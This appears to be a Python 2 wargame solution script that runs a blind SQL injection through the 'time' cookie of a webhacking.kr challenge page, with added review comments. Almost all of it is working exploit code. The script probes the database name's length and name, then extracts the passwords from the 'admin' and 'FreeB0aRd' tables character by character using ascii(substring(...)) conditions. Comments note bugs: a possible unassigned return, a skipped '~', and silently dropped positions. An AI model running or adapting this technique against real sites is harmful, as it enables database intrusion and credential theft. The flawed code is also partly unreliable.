- import re,urllib, urllib2
# Target taken from the paste: a webhacking.kr challenge page (web-02).
url = "http://webhacking.kr/challenge/web/web-02/"
# Placeholder: replace with the PHPSESSID of your own logged-in session.
cookie = "PHPSESSID"
# Baseline value of the `time` cookie.
# NOTE(review): this variable is never read; every function below hard-codes
# the same number inside its payload string.
time = "1507748649"
lengthDatabase = 0
# Text the script looks for in the response body to decide that the injected
# condition evaluated to true.
MSG_OK = "2070-01-01 09:00:01"

print "\n".join((
    "***************************************************************************",
    " SQL BLIND COOKIE ",
    " Author: phantom0305 ",
    "***************************************************************************",
))
def SolveLengthDatabase():
    """Find the length of the current database name via the `time` cookie.

    For each candidate 0..99 a request is sent whose `time` cookie carries
    ``length(database())=<candidate>`` after the baseline number; a response
    containing ``MSG_OK`` is taken to mean the condition was true.

    This only works if the server places the cookie value into a SQL
    statement unescaped (presumed; the server code is not shown here).
    Treating the cookie as an integer, or binding it as a query parameter,
    removes the oracle. The probing shows up in access/WAF logs as a run of
    requests whose `time` cookie contains SQL keywords.

    NOTE(review): if no candidate matches, ``lengthDB`` is never assigned and
    the final ``return`` raises UnboundLocalError.
    """
    print "Dang tim chieu dai database.."
    for candidate in range(0, 100):
        try:
            request = urllib2.Request(url)
            condition = "1507748649 and length(database())=%d" % candidate
            cookie_header = "time=%s; PHPSESSID=%s;" % (condition, cookie)
            # Attach the session cookie together with the modified `time` value.
            request.add_header('Cookie', cookie_header)
            body = urllib2.urlopen(request).read()
            # The marker is present only when the appended condition held.
            if MSG_OK not in body:
                continue
            lengthDB = candidate
            break
        except urllib2.URLError as e:
            print e
    return lengthDB
# Step 1: determine how long the database name is, then report it.
lengthDatabase = SolveLengthDatabase()
print "Chieu Dai cua DATABASE la:%d" % (lengthDatabase,)
print "***************************************************************************"
# Accumulator that NameDatabase() appends to through its `global` statement.
nameDatabase = ""
def NameDatabase():
    """Recover the database name one character at a time.

    For every position 1..lengthDatabase the character codes 33..125 are
    tried in turn with ``ascii(substring(database(),pos,1))=<code>`` in the
    `time` cookie; the first code whose response contains ``MSG_OK`` is
    appended to the module-level ``nameDatabase``.

    NOTE(review): ``range(33, 126)`` stops at 125, so ``~`` (126) is never
    tried, and a position with no match is skipped silently, which shortens
    the result without any warning.
    """
    global nameDatabase
    global lengthDatabase
    print "Dang tim Ten DATABASE.. "
    for position in range(1, lengthDatabase + 1):
        for code in range(33, 126):
            try:
                request = urllib2.Request(url)
                condition = "1507748649 and ascii(substring(database(),%d,1))=%d" % (position, code)
                request.add_header('Cookie', "time=%s; PHPSESSID=%s" % (condition, cookie))
                body = urllib2.urlopen(request).read()
                if MSG_OK not in body:
                    continue
                print chr(code)
                nameDatabase = nameDatabase + chr(code)
                break
            except urllib2.URLError as e:
                print e
    return nameDatabase
# Step 2: recover the database name and report it.
nameDatabase = NameDatabase()
print "Ten Database: %s" % (nameDatabase,)
print "***************************************************************************"
def findLengthPassword1():
    """Find the length of the ``password`` value in the ``admin`` table.

    Tries lengths 1..49 through the `time` cookie and stops at the first one
    whose response contains ``MSG_OK``.

    NOTE(review): the loop variable itself is returned, so when nothing
    matches the function returns 49 rather than signalling failure.
    """
    print "Dang tim length password admin.. "
    for length_guess in range(1, 50):
        try:
            request = urllib2.Request(url)
            condition = "1507748649 and (select length(password) from admin) =%d" % (length_guess)
            request.add_header('Cookie', "time=%s; PHPSESSID=%s" % (condition, cookie))
            body = urllib2.urlopen(request).read()
            if MSG_OK not in body:
                continue
            print str(length_guess)
            break
        except urllib2.URLError as e:
            print e
    return length_guess
# Step 3: length of the admin password, read later by findPassword1().
lengthPassadmin = findLengthPassword1()
print "Chieu dai password admin = %d" % (lengthPassadmin,)
print "***************************************************************************"
def findPassword1():
    """Recover the ``password`` value of the ``admin`` table character by character.

    Uses the module-level ``lengthPassadmin`` as the number of positions and
    tries character codes 33..125 for each one; a response containing
    ``MSG_OK`` confirms the guess.

    NOTE(review): code 126 (``~``) is outside ``range(33, 126)``, and an
    unmatched position is skipped without any indication.
    """
    global lengthPassadmin
    passwordAdmin = ""
    print "Dang tim password admin.. "
    for position in range(1, lengthPassadmin + 1):
        for code in range(33, 126):
            try:
                request = urllib2.Request(url)
                condition = "1507748649 and (select ascii(substring(password,%d,1)) from admin) = %d" % (position, code)
                request.add_header('Cookie', "time=%s; PHPSESSID=%s" % (condition, cookie))
                body = urllib2.urlopen(request).read()
                if MSG_OK not in body:
                    continue
                passwordAdmin += chr(code)
                # Show progress after each confirmed character.
                print passwordAdmin
                break
            except urllib2.URLError as e:
                print e
    return passwordAdmin
# Step 4: recover and print the admin password.
passAdmin = findPassword1()
print "PASSWORD cua admin la: %s" % (passAdmin,)
def findLengthPassword2():
    """Find the length of the ``password`` value in the ``FreeB0aRd`` table.

    Tries lengths 1..49 through the `time` cookie and stops at the first one
    whose response contains ``MSG_OK``.

    NOTE(review): the loop variable itself is returned, so when nothing
    matches the function returns 49 rather than signalling failure.
    """
    print "Dang tim length password FreeB0aRd.. "
    for length_guess in range(1, 50):
        try:
            request = urllib2.Request(url)
            condition = "1507748649 and (select length(password) from FreeB0aRd) =%d" % (length_guess)
            request.add_header('Cookie', "time=%s; PHPSESSID=%s" % (condition, cookie))
            body = urllib2.urlopen(request).read()
            if MSG_OK not in body:
                continue
            print str(length_guess)
            break
        except urllib2.URLError as e:
            print e
    return length_guess
# Step 5: length of the FreeB0aRd password, read later by findPassword2().
lengthPassFreeB0aRd = findLengthPassword2()
def findPassword2():
    """Recover the ``password`` value of the ``FreeB0aRd`` table character by character.

    Uses the module-level ``lengthPassFreeB0aRd`` as the number of positions
    and tries character codes 33..125 for each one; a response containing
    ``MSG_OK`` confirms the guess.

    NOTE(review): code 126 (``~``) is outside ``range(33, 126)``, and an
    unmatched position is skipped without any indication.
    """
    global lengthPassFreeB0aRd
    passwordFreeB0aRd = ""
    print "Dang tim password FreeB0aRd.. "
    for position in range(1, lengthPassFreeB0aRd + 1):
        for code in range(33, 126):
            try:
                request = urllib2.Request(url)
                condition = "1507748649 and (select ascii(substring(password,%d,1)) from FreeB0aRd) = %d" % (position, code)
                request.add_header('Cookie', "time=%s; PHPSESSID=%s" % (condition, cookie))
                body = urllib2.urlopen(request).read()
                if MSG_OK not in body:
                    continue
                passwordFreeB0aRd += chr(code)
                # Show progress after each confirmed character.
                print passwordFreeB0aRd
                break
            except urllib2.URLError as e:
                print e
    return passwordFreeB0aRd
# Step 6: recover and print the FreeB0aRd password.
passFreeB0aRd = findPassword2()
print "Pass cua bang FreeB0aRd: %s" % (passFreeB0aRd,)